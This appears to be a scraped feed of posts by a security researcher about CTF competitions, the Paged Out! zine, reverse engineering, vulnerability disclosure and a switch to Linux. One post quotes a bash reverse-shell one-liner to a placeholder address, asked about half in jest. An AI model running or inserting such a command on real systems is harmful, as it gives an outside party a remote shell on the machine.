Me coding with ~5y experience:
1. write code
Me coding with ~30y experience:
1. read docs for fopen()
2. write 1 line of code
3. check 17 different things in docs/internets about fopen
4. reverse fopen implementation because this one detail...
5. decide to use different function.
Paged Out!
#1
is out! (and it's free to download!)
There are 57 articles in 12 categories:
Electronics
Programming
Assembly
Reverse Engineering
Sec/Hack
Retro
File Formats
Algorithmics
SysAdmin
Radio
Phreaking
OS Internals
Enjoy!
#PagedOut
!
Friday was my last day at Google. I'm saddened to leave behind my team of the last 12+ years, but I know Google's security is in great hands.
It's time for a short break and then I'm moving on with plans I've made long ago – my own sec research, consulting, and education company.
My first program in Python! I still find this syntax a bit confusing with no { } etc.
def main(
line0: print("Hello World!"),
line1: print("What's your name?"),
line2: (x := input("Name plz: ")),
line3: print(f"Your name is: {x}")
):
pass
So an AMD engineer and 2 Google engineers walk into a bar... and write an article about how "Hello World" in
#Python
works.
The article turns out to be 26 pages. From Python, through C, WinAPI/Kernel, font rendering, to GPU.
Enjoy!
"Hello World under the microscope" - an article we wrote together with
@gynvael
and
@j00ru
! Originally published in issue 100 (1/2022) of the Programista magazine, now available online in Polish and English.
A fun and innovative ZIP bomb by David Fifield (and an excellent technical write-up - take a look if you like file format hacks):
zbsm.zip42 kB→5.5 GB
zblg.zip10 MB→281 TB
zbxl.zip46 MB→4.5 PB
My first program in Python! I still find this syntax a bit confusing with no { } etc.
def main(
line0: print("Hello World!"),
line1: print("What's your name?"),
line2: (x := input("Name plz: ")),
line3: print(f"Your name is: {x}")
):
pass
I just randomly found a YouTube channel with 22 videos that explain modern cryptographic algorithms + show how to implement them in Python! Awesome for learning crypto!
The channel has 80 subs.
Any chance we could show some love to the creator?
Plz RT
Boss: Hey IT guy, can you program our pharmacy logo to flash or sth?
Bob: Say no more!
Narrator: Bob, a demoscene veteran, was waiting for this opportunity for 25 years.
TIL from
@q3k
and
@marcan42
: wget saves downloaded file's source URL (and sometimes referrer) in extended attributes.
This includes the cases where the URL has a user/password in it 🙃
$ getfattr -d -m - test
user.xdg.origin.url="
https://user:[email protected]/"
Random tip for Windows users:
If you are worried about accidentally double-clicking a malicious executable in your Download folder or are worried about random DLLs (carpet bombing / DLL hell), just DISABLE EXECUTION in that folder:
icacls Download /deny Everyone:(OI)(IO)(X)
I think these are the two most useful posts I have on my blog (i.e. I'm referencing them in chat a lot):
FAQ: How to learn reverse-engineering?
FAQ: How to find vulnerabilities?
If you're just starting in programming/infosec, here's a list of obvious and less obvious things you can put on your CV - a 🧵
Some of these things can be done in a week and might improve your CV.
Did I miss something? Please add to the thread.
And RT so it helps more people :)
Yesterday's "Breaking "DRM" in Polish trains" talk by
@dsredford
/ MrTick / q3k was one of the best investigative reverse-engineering case studies I've seen. It's a must watch.
Service announcement:
I've got the so-called long-COVID (3 months in at this point), so currently all my projects (YouTube livestreams,
@pagedout_zine
, etc) are put on hold until I get better. Sorry!
Paged Out!
#2
(Nov 2019) is out! And it's free to download :)
This issue has 55 articles in 11 categories:
Programming
OS Internals
Assembly
Operating Systems
GameDev
Electronics
Security/Hacking
SysAdmin
Reverse Engineering
Algorithms
Writing Articles
Windows 11 is wonderful!
So I'm switching to Linux (Kubuntu) on my main PC - apologies to all hackers who had a shell on my device from the last re-install ~10-16 years ago.
Anyway, I'll use this thread to note some funny bits I notice during migration.
Call for One Page Articles for the 1st issue of Paged Out! zin!
(it's a new free experimental deeply technical zin we're starting; it's about programming/security/hacking/demoscene/retro/electronics/etc)
Details:
Story:
Please RT :)
So
@j00ru
published two posts on Windows Registry; given that there were a lot of fixes in Windows Registry in recent months I expect these to be fun ;)
Ah dealing with companies with poor security processes is always such a pleasure.
Here's Powertek threatening me with their lawyers for disclosing (patched) vulnerabilities in their PDUs:
If you're into programming, hacking, retro computers, electronics, etc check out our free magazine:
💾
Issues
#1
and
#2
are already out!
For Issue
#3
we're looking for:
- Articles and Art!
- Free community ads!
- And sponsorship ads!
Deadline: 20.02.20
Woah that was a busy month!
- Google CTF Finals (co-organizing)
- Security PWNing Conference (co-organizing)
- Dragon CTF (co-organizing)
- Paged Out!
#2
(organizing)
Time for some rest :)
An informal review of CTF abuse (or how folks try to win CTFs in a not purely ethical way):
Know more stories like this which I've missed? Please share!
A pretty amazing opportunity to see (and compare RE methods of) 4 security youtubers/streamers as they go against an upgraded Google CTF 2018 BQ RE challenge -
Kudos to ReverseiT &
@MurmusCTF
@Zanidd
@_johnhammond
@LiveOverflow
!
ingredients=flour%20butter%20sugar%20egg%20salt;temperature=180;mix=1;bake=1
If Twitter can store its cookies in my browsers, I'm going to store my cookies on Twitter 😠
I'm going to do a longer stream tomorrow (expected 4h) to solve all the challenges from Google's CTF Beginners Quest 2019.
There are 13 challenges, some of them having two flags.
Should be fun :)
#googlectf
Any ideas for Masters/Bachelors thesis topics around malware analysis, reverse engineering, low-level security or other infosec topics?
Please RT too - I get this question a lot and I always struggle to answer. So I hope to use our community's wisdom and send folks here :)
Current collection of cursed operators in various programming languages (from various sources).
New submissions welcomed!
Featuring at least
#javascript
#python
#c
and
#cpp
, but most of these "work" in other languages too.
So it's been about a month since I switched from Windows 10 to Linux (Kubuntu) on my main workstation. Here's a 🧵with some thoughts.
If you have any hints towards the points below, or in general, do let me know :)
A really solid command-line JSON viewer for Linux I found today: - super useful when dealing with documented-as-usual-so-not-at-all JSON APIs :)
Remember to type :help to see keyboard shortcuts. And it also supports mouse in a proper way!
Question: An up-to-date book for getting to know Linux Kernel (internals)?
Recommendations welcomed :)
If you have non-book resources on the topic: also welcomed!
If you're wondering why did we explicitly banned cryptocurrency/blockchain ads, here are a couple of fun screenshots (1st one if from a PM, the rest from my public discord) ;)
#pagedout
New into CTFs? Full-format ranked CTFs look scary? Or just looking to have fun and learn something? Try the Beginners Quest @ Google CTF Quals :)
#GoogleCTF
In the topic of
#GoogleCTF
- I will be showing how to solve all of the Beginners Quest challenges on a special livestream tomorrow (Tue), 8pm CEST:
(recording will be available)
The final match of Hackceler8 (GoogleCTF Final Event) is now over!
1st + $3k. PPP (
@PlaidCTF
)
2nd + $2k. I Use Bing
3rd + $1k. pasten (
@pastenctf
)
4th + $500. TFNS (
@FlatNetworkOrg
)
Congratz!
Our experimental speed-hacking competition is now over. Videos soon! GG :)
In case you're wondering how block ciphers work...
(one of my viewers sent it to me; too funny not to share; in my defense, the stream wasn't about block ciphers 🙃)
This reminded me of when early in my career I reported a vulnerability in Starcraft map format (potential RCE) to Blizzard and in reply got advice to install an anti-virus and a firewall 🙃
Reporting vulnerabilities is an art of its own 😆
Question: What's the shortest Windows reverse shell that you know? Is there something like GNU/Linux' bash -i >& /dev/tcp/10.0.0.1/8080 0>&1 ?
Obligatory disclaimer: Asking for a friend.
Recording of solving all (19) challenges from
#GoogleCTF
Beginners Quest is up: (description has timestamps for all challenges + a link to the github repo with scripts/notes)
Our security team is hiring in Zurich/Sunnyvale/Seattle!
We're looking for security specialists interested in security code reviews of both large complex systems and smaller applications (all over the software stack - from web apps, down to even firmware).
DM me if interested.
A question:
Which infosec companies employ & hire folks on Vulnerability Researcher position (>50% of work time spent on vulnerability research)?
I know a few, but I'm wondering if there are more companies like that. And yes, I know it's pretty rare :)
Stephen from my team just published his amazing research on Spectre exploitation in JS via Browser (spoiler: yes, it's exploitable)!
Details on , but also at .
Service announcement update:
Still having post COVID syndrome (9 months in at this point). All projects (YouTube livestreams,
@pagedout_zine
, etc) are still on hold. Sorry!
Trying to add enough cameras over my hardware desk so I could actually include it in livestreams. Progress so far includes 2 main cameras in place (overhead and microscope) and a lot of cable management on the horizon.
Boosting signal for folks analyzing liblzma/xz:
q3k: "I have managed to extract a list of encoded strings within the liblzma/xz backdoor payload (5.6.1)"
@LiveOverflow
@svblxyz
@KodyKinzie
@YouTube
Nah, our channels will be fine since we only show how to bypass INsecure computer systems ;)
On a more serious note I'll take a look when I'm back from vacation.
Hey
@github
, what's the reason that you're allowing an account impersonating me, abusing my copyrights+trademarks to stand active for over 11 days from it being reported to you by multiple parties?
Is this the typical pace you're dealing with abuse?
Ctx:
Dear Jonathan: "Accepted" means an engineer has accepted to look at your report - that's about it, nothing less, nothing more.
It does not mean your report has been considered valid - this will be decided later on and communicated in a reply.
Absolutely amazing article on ZIP files by
@hansw2000
, with in-depth description of the compression algorithms and a step-by-step example implementation!
Hey folks! Since my sabbatical is over I wanted to grab this opportunity to discuss what was (Google), what will be (my next plans), and get back to livestreaming at the same time.
EN (this Tue 8PM CEST):
PL (this Wed 8PM CEST):
Our CTF team placed top1 @ in 2019!
That's the 3rd top1 in the history of our team, and I'm really proud of our team's accomplishments!
Kudos to our captain valis, our vice-captain
@dsredford
, all the team members and all guest players that played with us!
2019 was a great year for Dragon Sector!
🏆1st place at global ranking for the 2nd year in a row & 3rd time in the history of our team
🥇1st place at 2 CTFs
🥈2nd place at 5 CTFs
🥉3rd place at 5 CTFs
💻And also organized a well received Dragon CTF 2019!
How to make sure no one complains about your soldering quality - tutorial:
1. Solder wires to the PCB.
2. Put a huge blob of glue on top of it.
3. ...
4. Profit?
This case is hilarious ;)
It's an 0-day. When SSD tried to report to
@NETGEAR
/
@Bugcrowd
, whoever handled the report seems to have ???misread the newest firmware version for R7000 as 1.3.2.134???, and the bug affects only 1.0.11.116. Problem is, 1.0.11.116 is the newest fw🙃
New advisory is now out!
The Nighthawk R7000 is a popular Netgear router, with over 50,000 positive reviews on Amazon.
Find out how a vulnerability in NETGEAR R7000 allows an attacker to run arbitrary code without requiring authentication.
I'm in full vacation mode and I decided to play Amberstar (1992).
I played a few hours and decided the UX is, well, 1992-like. So now I'm learning AmigaOS/M68K assembly to change some things that were annoying me...
I'll be posting some curious things I find in this thread.
This! The "Reverse Compilation Techniques" thesis by
@criscifuentes
was one of two main resources I've used when learning reverse engineering (the other was "Reversing: Secrets of Reverse Engineering" book). Definitely recommended reading :)
A sometimes lost fact, but the entire field of decompilation using compiler and program analysis techniques that we know as standard practice today as seen in IDA Hex Rays and Ghidra was invented by
@criscifuentes
and her thesis on the DCC decompiler in 1994.
This idea is absolutely barbaric and just gruesome. Folks, I am a vulnerability researcher. I stare at the screen the whole day looking at code. And you want me to do THIS?! The whole idea is bound to just bring pain and suffering to people.
I'm fine with the boxing part though.
@hackthebox_eu
ok, hear me out.
"Hack The Boxing". It's like Chess Boxing, but we alternate between boxing and solving a HTB machine.
I just thought up the concept, but can't claim credit for the name.
Finally reached 10k subs on my English YT channel! :)
Thank you for your trust! (though seriously, keep verifying what I say)
And kudos + big thx to my livestream team for helping me out:
@foxtrot_0x4fult
@KrzaQ2
@disconnect3d_pl
@masakralol
and maryush :)
One of my favorite things about Switzerland:
trust in society
The flower shop in the photo is closed, but the merchandise is left outside. The sign blocking the door says "if the door is closed, it's self service; scan QR-CODE to pay with TWINT".
And that's not a rare thing!
After a long wait we released match videos/sources of our experimental CTF-meets-speedrunning competition - Hackceler8!
BIG THANKS to the competing CTF teams and all the Hackceler8 organizers!